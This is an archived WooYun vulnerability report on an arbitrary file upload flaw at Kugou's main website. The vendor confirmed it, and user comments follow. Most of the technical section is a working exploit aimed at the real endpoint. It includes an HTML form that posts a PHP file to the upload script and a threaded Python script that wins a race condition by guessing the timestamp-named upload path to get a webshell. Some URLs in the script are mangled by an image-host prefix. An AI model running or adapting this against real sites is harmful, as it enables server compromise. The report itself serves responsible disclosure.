当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0208816

漏洞标题:酷狗主站的一处任意文件上传可shell

相关厂商:酷狗

漏洞作者: 李长歌

提交时间:2016-05-15 10:09

修复时间:2016-06-30 10:00

公开时间:2016-06-30 10:00

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-15: 细节已通知厂商并且等待厂商处理中
2016-05-16: 厂商已经确认,细节仅向厂商公开
2016-05-26: 细节向核心白帽子及相关领域专家公开
2016-06-05: 细节向普通白帽子公开
2016-06-15: 细节向实习白帽子公开
2016-06-30: 细节向公众公开

简要描述:

酷狗主站的一处任意文件上传可shell。

详细说明:

存在任意上传的地址为 http://www.kugou.com/kf/kf/app/upload.php
保存html文件然后上传

<html>
<body>
<form action="http://www.kugou.com/kf/kf/app/upload.php" method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="imgFile" id="imgFile" /> 
<br />
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>


得到一个路径 {"error":0,"url":".\/upload\/1463241818.php"}
但是我们访问http://www.kugou.com/kf/kf/apphttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/1463241818.php 无法找到网页

QQ截图20160515005421.jpg


上传瞬间 就被删除了。
利用条件竞争,在被删除之前生成一个shell,上传之后的路径可以猜测到
写个脚本在上传php文件的时候同时进行猜测访问路径

import urllib2  
import threading
import time
def request_uri():
    uri = 'http://www.kugou.com/kf/kf/apphttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/%s.php' % str(time.time()).split('.')[0]
    try:
        req = urllib2.Request(uri)
        response = urllib2.urlopen(req).read()
        print 'except %s' % uri
        print response
    except Exception, e:
        pass
def start():
    threads = []
    for i in xrange(30):
        threads.append(threading.Thread(target=request_uri))
    for t in threads:
        t.start()
    for t in threads:
        t.join()
if __name__=='__main__':
    while True:
        start()


QQ截图20160515000124.jpg

漏洞证明:

QQ截图20160515004422.jpg


QQ截图20160515004918.jpg

修复方案:

shell已删,修复

版权声明:转载请注明来源 李长歌@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2016-05-16 09:56

厂商回复:

谢谢提交!

最新状态:

暂无

漏洞评价:

评价

  1. 2016-05-15 11:04 | jackyu ( 路人 | Rank:28 漏洞数:18 | 世界上没有一个系统是绝对安全的,系统最大...)

    ImageMagickk?

  2. 2016-05-15 11:15 | 李长歌 ( 普通白帽子 | Rank:426 漏洞数:44 | http://www.wooyun.org/)

    @jackyu 不是。

  3. 2016-05-15 16:49 | dr.m1st3r ( 实习白帽子 | Rank:54 漏洞数:10 | 一个爱泡妞的好骚年。)

    mark

  4. 2016-05-15 22:34 | 重瞳 ( 路人 | Rank:11 漏洞数:2 | 我是重瞳)

    吊吊吊

  5. 2016-05-19 09:32 | ba1ma0 ( 路人 | Rank:14 漏洞数:5 | 什么都不会..)

    叼叼叼

  6. 2016-05-19 09:47 | D&G ( 普通白帽子 | Rank:780 漏洞数:158 | going)

    主站shell也才给个7,好像自己给钱似的

  7. 2016-05-19 15:53 | whynot ( 普通白帽子 | Rank:678 漏洞数:136 | 为你解冻冰河 为你放弃世界有何不可)

    表哥你真厉害

  8. 2016-06-05 10:14 | whynot ( 普通白帽子 | Rank:678 漏洞数:136 | 为你解冻冰河 为你放弃世界有何不可)

    666666我还以为这种只有审计能发现的

  9. 2016-06-06 09:35 | D&G ( 普通白帽子 | Rank:780 漏洞数:158 | going)

    这也能黑盒。。。。

  10. 2016-06-30 10:07 | 欧尼酱 ( 路人 | Rank:15 漏洞数:8 | 技术马马虎虎)

    6666666

  11. 2016-06-30 10:08 | Mr_Java ( 普通白帽子 | Rank:170 漏洞数:43 | 高三党,当,档,裆!)

    这酷狗太不像话了。。。。。。才这点rank

  12. 2016-06-30 10:10 | 大志哥 ( 路人 | Rank:22 漏洞数:9 | @_@)

    主站都getshell了还只有中,7rank